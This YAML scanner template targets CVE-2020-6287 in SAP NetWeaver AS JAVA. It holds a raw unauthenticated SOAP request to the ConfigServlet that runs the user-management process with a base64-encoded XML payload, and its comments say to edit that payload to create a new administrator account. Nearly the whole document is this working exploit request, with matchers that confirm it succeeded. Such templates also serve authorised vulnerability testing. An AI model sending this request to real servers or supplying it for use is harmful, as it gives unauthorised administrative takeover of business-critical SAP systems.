id: cve-2020-6287

info:
  name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
  author: dwisiswant0
  severity: critical

  # Affected Versions: 7.30, 7.31, 7.40, 7.50

  # p.s:
  # > Don't forget to change the default credentials
  # > to create new admin in associated file:
  # > `payloads/CVE-2020-6287.xml`

  # Ref:
  # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287

requests:
  - payloads:
      data: "payloads/CVE-2020-6287.xml"
    raw:
      - |
        POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "urn:CTCWebServiceSi"
        part: body
      - type: status
        status:
          - 200